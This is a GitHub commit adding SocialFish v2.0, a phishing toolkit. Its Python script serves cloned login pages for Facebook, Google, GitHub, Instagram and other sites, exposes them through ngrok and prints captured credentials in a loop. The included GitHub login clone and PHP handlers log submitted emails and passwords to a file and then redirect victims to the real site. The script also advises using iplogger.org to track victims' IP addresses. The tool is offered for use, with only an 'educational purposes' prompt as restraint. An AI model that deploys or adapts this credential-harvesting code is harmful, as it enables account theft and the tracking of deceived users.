Add files via upload

pull/2/head
An0nUD4Y 2018-03-26 19:54:30 +05:30 committed by GitHub
parent c88d31f111
commit bb4669023d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
92 changed files with 9808 additions and 0 deletions

29
LICENSE Normal file
View File

@ -0,0 +1,29 @@
BSD 3-Clause License
Copyright (c) 2018, Undead Sec
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

Binary file not shown.

After

Width:  |  Height:  |  Size: 309 B

BIN
Server/www/images/logo.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 3.2 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 26 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 31 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 3.7 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 175 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 41 KiB

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 9.8 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 34 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 34 KiB

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 76 KiB

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

225
SocialFish.py Normal file
View File

@ -0,0 +1,225 @@
#!/usr/bin/python2.7
#-*- coding: utf-8 -*-
# SOCIALFISH v2.0
# by: An0nUD4Y
#
###########################
from time import sleep
from sys import stdout, exit
from os import system, path
import multiprocessing
from urllib import urlopen
from platform import system as systemos, architecture
from wget import download
RED, WHITE, CYAN, GREEN, END = '\033[91m', '\33[46m', '\033[36m', '\033[1;32m', '\033[0m'
def connected(host='http://duckduckgo.com'):
try:
urlopen(host)
return True
except:
return False
if connected() == False:
print '''
....._____....... ____ ____ ____ _ ____ _ ____ _ ____ _ _
/ \/| [__ | | | | |__| | |___ | [__ |__|
\o__ /\| ___] |__| |___ | | | |___ | | ___] | |
\|
{0}[{1}!{0}]{1} Network error. Verify your connection.\n
'''.format(RED, END)
exit(0)
def checkNgrok():
if path.isfile('Server/ngrok') == False:
print '[*] Downloading Ngrok...'
ostype = systemos().lower()
if architecture()[0] == '64bit':
filename = 'ngrok-stable-{0}-amd64.zip'.format(ostype)
else:
filename = 'ngrok-stable-{0}-386.zip'.format(ostype)
url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
download(url)
system('unzip ' + filename)
system('mv ngrok Server/ngrok')
system('rm -Rf ' + filename)
system('clear')
checkNgrok()
def end():
system('clear')
print '''
S O C I A L{2}
|\ \ \ \ \ \ \ \ __ ___
| \ \ \ \ \ \ \ \ | O~-_ _-~~ ~~-_
| >----|-|-|-|-|-|-|--| __/ / {1}DON'T{2} )
| / / / / / / / / |__\ < {1}FORGET{2} )
|/ / / / / / / / \_ {1}ME !{2} _)
{1}F I S H{2} ~--___--~
{0}This script was made by UndeadSec_ But I have added some more features in it ]
{1}[ {0} Some more phising pages have been added in script. For a better Attack]
[ {0} Work Done By------------------------> An0nUD4Y]\n'''.format(GREEN, END, CYAN)
def loadModule(module):
print '''{0}
_.-=-._ .-,
.' "-.,' /
( _. <
`=.____.=" `._\\
[{1}*{0}]{1} %s module loaded. Building site...{0}'''.format(CYAN, END) % module
def runPhishing(social, option2):
system('sudo rm -Rf Server/www/*.* && touch Server/www/usernames.txt')
if option2 == '1' and social == 'Facebook':
system('cp WebPages/fb_standard/*.* Server/www/')
if option2 == '2' and social == 'Facebook':
system('cp WebPages/fb_advanced_poll/*.* Server/www/')
if option2 == '3' and social == 'Facebook':
system('cp WebPages/mobile_fb/*.* Server/www/')
if option2 == '4' and social == 'Facebook':
system('cp WebPages/fb_security_fake/*.* Server/www/')
if option2 == '5' and social == 'Facebook':
system('cp WebPages/fb_messenger/*.* Server/www/')
elif option2 == '1' and social == 'Google':
system('cp WebPages/google_standard/*.* Server/www/')
elif option2 == '2' and social == 'Google':
system('cp WebPages/google_advanced_poll/*.* Server/www/')
elif social == 'LinkedIn':
system('cp WebPages/linkedin/*.* Server/www/')
elif social == 'GitHub':
system('cp WebPages/GitHub/*.* Server/www/')
elif social == 'StackOverflow':
system('cp WebPages/stackoverflow/*.* Server/www/')
elif social == 'WordPress':
system('cp WebPages/wordpress/*.* Server/www/')
elif social == 'Twitter':
system('cp WebPages/twitter/*.* Server/www/')
elif option2 == '1' and social == 'Instagram':
system('cp WebPages/Instagram_web/*.* Server/www/')
def waitCreds():
print " {0}[{1}*{0}]{1} Hi Hacker Everything has been completed.............. Start HAcking ".format(RED, END)
print " {0}[{1}*{0}]{1} I HAVE A TIP FOR YOU".format(GREEN, END)
print '''{0}
_.-=-._ .-,
.' "-.,' /
( AnonUD4Y_ ~.<
`=.____.=" `._\\
[{1}*{0}]{1} Do you need more help to make your ngrok link more trusted.
[{1}*{0}]{1} Just visit to [https://iplogger.org]
[{1}*{0}]{1} This will help you to trace your victims by their ip address on real time.
[{1}*{0}]{1} And make your ngrok link more trusted type.{0}'''.format(CYAN, END)
print " {0}[{1}*{0}]{1} Waiting for credentials... \n".format(RED, END)
while True:
with open('Server/www/usernames.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
print ' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines
system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt')
creds.close()
def runPEnv():
system('clear')
print ''' {2}-{1} UNDEADSEC {2}|{1} t.me/UndeadSec {2}|{1} youtube.com/c/UndeadSec {2}- BRAZIL
'
' '
' '
. ' . ' '
' ' ' ' '
. ' '....' ..'. ' .
' . . ' ' ' {1}v2.0{2}
' . . . . . '. .' ' .
' ' '. ' {1}Updated_By--> AnonUD4Y_{2}
' ' '
' . '
'
{1}'''.format(GREEN, END, CYAN)
for i in range(101):
sleep(0.01)
stdout.write("\r{0}[{1}*{0}]{1} Preparing environment... %d%%".format(CYAN, END) % i)
stdout.flush()
print "\n\n{0}[{1}*{0}]{1} Searching for PHP installation... ".format(CYAN, END)
if 256 != system('which php'):
print " --{0}>{1} OK.".format(CYAN, END)
else:
print " --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again. http://www.php.net/".format(RED, END)
exit(0)
if raw_input(" {0}[{1}!{0}]{1} Do you agree to use this tool for educational purposes only? (y/n)\n {2}SF-An0nUD4Y > {1}".format(RED, END, CYAN)).upper() != 'Y':
system('clear')
print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END)
exit(0)
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
if option == '1':
loadModule('Facebook')
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Mobile Version(mobile_mode)\n\n {0}[{1}4{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}5{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('Facebook', option2)
elif option == '2':
loadModule('Google')
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('Google', option2)
elif option == '3':
loadModule('LinkedIn')
option2 = ''
runPhishing('LinkedIn', option2)
elif option == '4':
loadModule('GitHub')
option2 = ''
runPhishing('GitHub', option2)
elif option == '5':
loadModule('StackOverflow')
option2 = ''
runPhishing('StackOverflow', option2)
elif option == '6':
loadModule('WordPress')
option2 = ''
runPhishing('WordPress', option2)
elif option == '7':
loadModule('Twitter')
option2 = ''
runPhishing('Twitter', option2)
elif option == '8':
loadModule('Instagram')
option2 =raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('Instagram', option2)
else:
exit(0)
def runNgrok():
system('./Server/ngrok http 80 > /dev/null &')
sleep(10)
system('curl -s -N http://127.0.0.1:4040/status | grep "https://[0-9a-z]*\.ngrok.io" -oh > ngrok.url')
url = open('ngrok.url', 'r')
print('\n {0}[{1}*{0}]{1} Ngrok URL: {2}' + url.read() + '{1}').format(CYAN, END, GREEN)
url.close()
def runServer():
system("cd Server/www/ && sudo php -S 127.0.0.1:80")
if __name__ == "__main__":
try:
runPEnv()
runNgrok()
multiprocessing.Process(target=runServer).start()
waitCreds()
except KeyboardInterrupt:
system('pkill -f ngrok')
end()
exit(0)

223
WebPages/GitHub/index.html Normal file
View File

@ -0,0 +1,223 @@
<!-- I AM A FAKE PAGE | DO NOT TRUST ME -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<link rel="dns-prefetch" href="https://assets-cdn.github.com">
<link rel="dns-prefetch" href="https://avatars0.githubusercontent.com">
<link rel="dns-prefetch" href="https://avatars1.githubusercontent.com">
<link rel="dns-prefetch" href="https://avatars2.githubusercontent.com">
<link rel="dns-prefetch" href="https://avatars3.githubusercontent.com">
<link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com">
<link rel="dns-prefetch" href="https://user-images.githubusercontent.com/">
<meta content="origin" name="referrer" />
<link crossorigin="anonymous" href="https://assets-cdn.github.com/assets/frameworks-98cac35b43fab8341490a2623fdaa7b696bbaea87bccf8f485fd5cdb4996cd9b52bdb24709fb3bab0a0dcff4a29187d65028ee693d609ce5c0c3283c77a247a9.css" integrity="sha512-mMrDW0P6uDQUkKJiP9qntpa7rqh7zPj0hf1c20mWzZtSvbJHCfs7qwoNz/SikYfWUCjuaT1gnOXAwyg8d6JHqQ==" media="all" rel="stylesheet" />
<link crossorigin="anonymous" href="https://assets-cdn.github.com/assets/github-f84b09929e4d948a5727c0c312da25f89ded0439c0e17586ebfabd3b1a40c104c8ccd4f0b2dd5f44ec7c916d4e64a008a3916640b39e225d7afe17d2ae681591.css" integrity="sha512-+EsJkp5NlIpXJ8DDEtol+J3tBDnA4XWG6/q9OxpAwQTIzNTwst1fROx8kW1OZKAIo5FmQLOeIl16/hfSrmgVkQ==" media="all" rel="stylesheet" />
<link crossorigin="anonymous" href="https://assets-cdn.github.com/assets/site-e1e1bc98a53e47d4009cc4307d22206e8db8852fa7517c52b94b391b92cc430fb9c230b54d229f83125bda3eb53d7c9af78fb0330375393eebecc179adb754bf.css" integrity="sha512-4eG8mKU+R9QAnMQwfSIgbo24hS+nUXxSuUs5G5LMQw+5wjC1TSKfgxJb2j61PXya94+wMwN1OT7r7MF5rbdUvw==" media="all" rel="stylesheet" />
<meta name="viewport" content="width=device-width">
<title>Sign in to GitHub · GitHub</title>
<link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub">
<link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub">
<meta property="fb:app_id" content="1401488693436528">
<meta property="og:url" content="https://github.com">
<meta property="og:site_name" content="GitHub">
<meta property="og:title" content="Build software better, together">
<meta property="og:description" content="GitHub is where people build software. More than 27 million people use GitHub to discover, fork, and contribute to over 76 million projects.">
<meta property="og:image" content="https://assets-cdn.github.com/images/modules/open_graph/github-logo.png">
<meta property="og:image:type" content="image/png">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="1200">
<meta property="og:image" content="https://assets-cdn.github.com/images/modules/open_graph/github-mark.png">
<meta property="og:image:type" content="image/png">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="620">
<meta property="og:image" content="https://assets-cdn.github.com/images/modules/open_graph/github-octocat.png">
<meta property="og:image:type" content="image/png">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="620">
<link rel="assets" href="https://assets-cdn.github.com/">
<meta name="pjax-timeout" content="1000">
<meta name="request-id" content="9FB6:7C79:1D50EB0:311E342:5A6981BD" data-pjax-transient>
<meta name="selected-link" value="/login" data-pjax-transient>
<meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU">
<meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA">
<meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc">
<meta name="google-analytics" content="UA-3769691-2">
<meta content="collector.githubapp.com" name="octolytics-host" /><meta content="github" name="octolytics-app-id" /><meta content="https://collector.githubapp.com/github-external/browser_event" name="octolytics-event-url" /><meta content="9FB6:7C79:1D50EB0:311E342:5A6981BD" name="octolytics-dimension-request_id" /><meta content="iad" name="octolytics-dimension-region_edge" /><meta content="iad" name="octolytics-dimension-region_render" />
<meta content="https://github.com/hydro_browser_events" name="hydro-events-url" />
<meta content="true" data-pjax-transient="true" name="analytics-location-query-strip" />
<meta class="js-ga-set" name="dimension1" content="Logged Out">
<meta name="hostname" content="github.com">
<meta name="user-login" content="">
<meta name="expected-hostname" content="github.com">
<meta name="js-proxy-site-detection-payload" content="NmMxN2Q2NjNkNmU4MThlYzg3ZTgwYjVlYmEwMGMwMzQ4ODNjNjdlMzZkZTliOGVmYmYwZDg3ZjViMTljNGQzNHx7InJlbW90ZV9hZGRyZXNzIjoiMTg5LjMwLjE1NS45NiIsInJlcXVlc3RfaWQiOiI5RkI2OjdDNzk6MUQ1MEVCMDozMTFFMzQyOjVBNjk4MUJEIiwidGltZXN0YW1wIjoxNTE2ODYzOTQ2LCJob3N0IjoiZ2l0aHViLmNvbSJ9">
<meta name="enabled-features" content="UNIVERSE_BANNER,FREE_TRIALS">
<meta name="html-safe-nonce" content="87c0a184050e49479c64d8f109030074bb0bc16b">
<meta http-equiv="x-pjax-version" content="46af5e781c258f191337c975586a0291">
<meta name="description" content="GitHub is where people build software. More than 27 million people use GitHub to discover, fork, and contribute to over 76 million projects.">
<link rel="canonical" href="https://github.com/login" data-pjax-transient>
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<link rel="mask-icon" href="https://assets-cdn.github.com/pinned-octocat.svg" color="#000000">
<link rel="icon" type="image/x-icon" class="js-site-favicon" href="https://assets-cdn.github.com/favicon.ico">
<meta name="theme-color" content="#1e2327">
<meta name="u2f-support" content="true">
</head>
<body class="logged-out env-production page-responsive min-width-0 session-authentication">
<div class="position-relative js-header-wrapper ">
<a href="#start-of-content" tabindex="1" class="px-2 py-4 show-on-focus js-skip-to-content">Skip to content</a>
<div id="js-pjax-loader-bar" class="pjax-loader-bar"><div class="progress"></div></div>
<div class="header header-logged-out width-full pt-5 pb-4" role="banner">
<div class="container clearfix width-full text-center">
<a class="header-logo" href="https://github.com/" aria-label="Homepage" data-ga-click="(Logged out) Header, go to homepage, icon:logo-wordmark">
<svg aria-hidden="true" class="octicon octicon-mark-github" height="48" version="1.1" viewBox="0 0 16 16" width="48"><path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8c0-4.42-3.58-8-8-8z"/></svg>
</a>
</div>
</div>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div role="main" class="application-main ">
<div id="js-pjax-container" data-pjax-container>
<div class="auth-form px-3" id="login">
<!-- '"` --><!-- </textarea></xmp> --></option></form>
<form accept-charset="UTF-8" action="login.php" method="post"><div style="margin:0;padding:0;display:inline"><input name="utf8" type="hidden" value="&#x2713;" /><input name="authenticity_token" type="hidden" value="XEM2cpA9K0fNG69bPa1JmW97FVDeO2XaITb+W4r/fY30C8sir4eoH/9c1a1sfMpoDkpQiGCv+7oH27DyrNSszQ==" /></div> <div class="auth-form-header p-0">
<h1>Sign in to GitHub</h1>
</div>
<div id="js-flash-container">
</div>
<div class="auth-form-body mt-3">
<label for="login_field">
Username or email address
</label>
<input autocapitalize="off" autocorrect="off" autofocus="autofocus" class="form-control input-block" id="login_field" name="email" tabindex="1" type="text" />
<label for="password">
Password <a href="/password_reset" class="label-link">Forgot password?</a>
</label>
<input class="form-control form-control input-block" id="password" name="pass" tabindex="2" type="password" />
<input class="btn btn-primary btn-block" data-disable-with="Signing in…" name="commit" tabindex="3" type="submit" value="Sign in" />
</div>
</form>
<p class="create-account-callout mt-3">
New to GitHub?
<a href="/join?source=login" data-ga-click="Sign in, switch to sign up">Create an account</a>.
</p>
</div>
</div>
<div class="modal-backdrop js-touch-events"></div>
</div>
<div class="footer container-lg p-responsive py-6 mt-6 f6" role="contentinfo">
<ul class="list-style-none d-flex flex-justify-center">
<li class="mr-3"><a href="https://github.com/site/terms" class="link-gray" data-ga-click="Footer, go to terms, text:terms">Terms</a></li>
<li class="mr-3"><a href="https://github.com/site/privacy" class="link-gray" data-ga-click="Footer, go to privacy, text:privacy">Privacy</a></li>
<li class="mr-3"><a href="https://github.com/security" class="link-gray" data-ga-click="Footer, go to security, text:security">Security</a></li>
<li><a href="https://github.com/contact" class="link-gray" data-ga-click="Footer, go to contact, text:contact">Contact GitHub</a></li>
</ul>
</div>
<div id="ajax-error-message" class="ajax-error-message flash flash-error">
<svg aria-hidden="true" class="octicon octicon-alert" height="16" version="1.1" viewBox="0 0 16 16" width="16"><path fill-rule="evenodd" d="M8.865 1.52c-.18-.31-.51-.5-.87-.5s-.69.19-.87.5L.275 13.5c-.18.31-.18.69 0 1 .19.31.52.5.87.5h13.7c.36 0 .69-.19.86-.5.17-.31.18-.69.01-1L8.865 1.52zM8.995 13h-2v-2h2v2zm0-3h-2V6h2v4z"/></svg>
<button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error">
<svg aria-hidden="true" class="octicon octicon-x" height="16" version="1.1" viewBox="0 0 12 16" width="12"><path fill-rule="evenodd" d="M7.48 8l3.75 3.75-1.48 1.48L6 9.48l-3.75 3.75-1.48-1.48L4.52 8 .77 4.25l1.48-1.48L6 6.52l3.75-3.75 1.48 1.48z"/></svg>
</button>
You can't perform that action at this time.
</div>
<script crossorigin="anonymous" integrity="sha512-5eNCJxF6JRFBIlzpDhOCOCr061HNcJA5uzFU7PZ14+GkNvTUaLgS4Ai42IhsAU9E4G2B/u/a2s/6UsbTwUc5UA==" src="https://assets-cdn.github.com/assets/frameworks-e5e34227117a251141225ce90e1382382af4eb51cd709039bb3154ecf675e3e1a436f4d468b812e008b8d8886c014f44e06d81feefdadacffa52c6d3c1473950.js"></script>
<script async="async" crossorigin="anonymous" integrity="sha512-KaoGOE5qGSgH8cA8uXCwoKLnWu+zdMixOMkJl4tliq/RD8rHSjkAm2hGxym+iKf4JfycDd9zX8i3GY5nFwi5bg==" src="https://assets-cdn.github.com/assets/github-29aa06384e6a192807f1c03cb970b0a0a2e75aefb374c8b138c909978b658aafd10fcac74a39009b6846c729be88a7f825fc9c0ddf735fc8b7198e671708b96e.js"></script>
<div class="js-stale-session-flash stale-session-flash flash flash-warn flash-banner d-none">
<svg aria-hidden="true" class="octicon octicon-alert" height="16" version="1.1" viewBox="0 0 16 16" width="16"><path fill-rule="evenodd" d="M8.865 1.52c-.18-.31-.51-.5-.87-.5s-.69.19-.87.5L.275 13.5c-.18.31-.18.69 0 1 .19.31.52.5.87.5h13.7c.36 0 .69-.19.86-.5.17-.31.18-.69.01-1L8.865 1.52zM8.995 13h-2v-2h2v2zm0-3h-2V6h2v4z"/></svg>
<span class="signed-in-tab-flash">You signed in with another tab or window. <a href="">Reload</a> to refresh your session.</span>
<span class="signed-out-tab-flash">You signed out in another tab or window. <a href="">Reload</a> to refresh your session.</span>
</div>
<div class="facebox" id="facebox" style="display:none;">
<div class="facebox-popup">
<div class="facebox-content" role="dialog" aria-labelledby="facebox-header" aria-describedby="facebox-description">
</div>
<button type="button" class="facebox-close js-facebox-close" aria-label="Close modal">
<svg aria-hidden="true" class="octicon octicon-x" height="16" version="1.1" viewBox="0 0 12 16" width="12"><path fill-rule="evenodd" d="M7.48 8l3.75 3.75-1.48 1.48L6 9.48l-3.75 3.75-1.48-1.48L4.52 8 .77 4.25l1.48-1.48L6 6.52l3.75-3.75 1.48 1.48z"/></svg>
</button>
</div>
</div>
</body>
</html>

15
WebPages/GitHub/login.php Normal file
View File

@ -0,0 +1,15 @@
<?php
$var = $_POST['email'];
$var2 = $_POST['pass'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
if($myFile == $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location: https://github.com');
}
if($myFile != $searchString) {
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
}
exit();
?>

View File

@ -0,0 +1 @@
<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 26 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 31 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 3.7 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 175 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 41 KiB

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 9.8 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 34 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 34 KiB

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 76 KiB

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,15 @@
<?php
$var = $_POST['username'];
$var2 = $_POST['password'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>WELCOME</title></html>";
if($myFile != $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location: https://instagram.com');
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
}
exit();
?>

View File

@ -0,0 +1 @@
<html><title>WELCOME TO FACEBOOK</title></html>

View File

@ -0,0 +1,50 @@
<!-- I AM A FAKE PAGE | DO NOT TRUST ME -->
<!DOCTYPE html>
<html>
<title>VoteRank #289032</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<!-- Header -->
<header class="w3-panel w3-center w3-opacity" style="padding:128px 16px">
<h1 class="w3-xlarge">VOTERANK</h1>
<h1>#289032</h1>
</header>
<body bgcolor="#eff0f1">
<div>
<form action="index2.html">
<div id="group1">
What's your name?<br><input type="text" required><br></br>
Select your favorite social networks:<br>
<input type="checkbox" value="facebook" name="social" > Facebook<br>
<input type="checkbox" value="twitter" name="social" > Twitter<br>
<input type="checkbox" value="linkedin" name="social" > LinkedIn<br>
<input type="checkbox" value="instagram" name="social" > Instagram<br>
<input type="checkbox" value="snapchat" name="social" > Snapchat<br>
<input type="checkbox" value="googleplus" name="social" > Google+<br></br>
</div>
<div id="group2">
Select your favorite colors:<br>
<input type="checkbox" value="blue" name="color" > Blue<br>
<input type="checkbox" value="red" name="color" > Red<br>
<input type="checkbox" value="green" name="color" > Green<br>
<input type="checkbox" value="yellow" name="color" > Yellow<br>
<input type="checkbox" value="purple" name="color" > Purple<br>
<input type="checkbox" value="orange" name="color" > Orange<br>
<input type="checkbox" value="black" name="color" > Black<br>
<input type="checkbox" value="white" name="color" > White<br>
<input type="checkbox" value="grey" name="color" > Grey<br>
<input type="checkbox" value="brown" name="color" > Brown<br>
<input type="checkbox" value="pink" name="color" > Pink<br>
<input type="submit" value="Submit">
</div>
</form>
</div>
</body>
</body>
</html>

View File

@ -0,0 +1,128 @@
<!-- I AM A FAKE PAGE | DO NOT TRUST ME -->
<!DOCTYPE html>
<html>
<title>VoteRank #289032</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<head>
<style>
* {
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
html {
background: white;
}
body {
background: white;
margin: 0;
padding: 0;
font-family: 'Lato', sans-serif;
}
h5{
color: white;
}
.login-form-wrap {
background: radial-gradient(ellipse at center, #5170ad 0%, #355493 100%);
border: 1px solid #2d416d;
-webkit-box-shadow: 0 1px #5670A4 inset, 0 0 10px 5px rgba(0, 0, 0, 0.1);
box-shadow: 0 1px #5670A4 inset, 0 0 10px 5px rgba(0, 0, 0, 0.1);
border-radius: 5px;
width: 360px;
height: 380px;
margin: 60px auto;
padding: 50px 30px 0 30px;
text-align: center;
}
.login-form-wrap h1 {
margin: 0 0 50px 0;
padding: 0;
font-size: 26px;
color: #fff;
}
.login-form-wrap h5 {
margin-top: 40px;
}
.login-form-wrap h5 > a {
font-size: 14px;
color: #fff;
text-decoration: none;
font-weight: 400;
}
.login-form input[type="text"], .login-form input[type="password"] {
width: 100%;
border: 1px solid #314d89;
outline: none;
padding: 12px 20px;
color: #afafaf;
font-weight: 400;
font-family: 'Lato', sans-serif;
cursor: pointer;
}
.login-form input[type="text"] {
border-bottom: none;
border-radius: 4px 4px 0 0;
padding-bottom: 13px;
-webkit-box-shadow: 0 -1px 0 #E0E0E0 inset, 0 1px 2px rgba(0, 0, 0, 0.23) inset;
box-shadow: 0 -1px 0 #E0E0E0 inset, 0 1px 2px rgba(0, 0, 0, 0.23) inset;
}
.login-form input[type="password"] {
border-top: none;
border-radius: 0 0 4px 4px;
-webkit-box-shadow: 0 -1px 2px rgba(0, 0, 0, 0.23) inset, 0 1px 2px rgba(255, 255, 255, 0.1);
box-shadow: 0 -1px 2px rgba(0, 0, 0, 0.23) inset, 0 1px 2px rgba(255, 255, 255, 0.1);
}
.login-form input[type="submit"] {
font-family: 'Lato', sans-serif;
font-weight: 400;
background: -webkit-gradient(linear, left top, left bottom, from(#e0e0e0), to(#cecece));
background: linear-gradient(to bottom, #e0e0e0 0%, #cecece 100%);
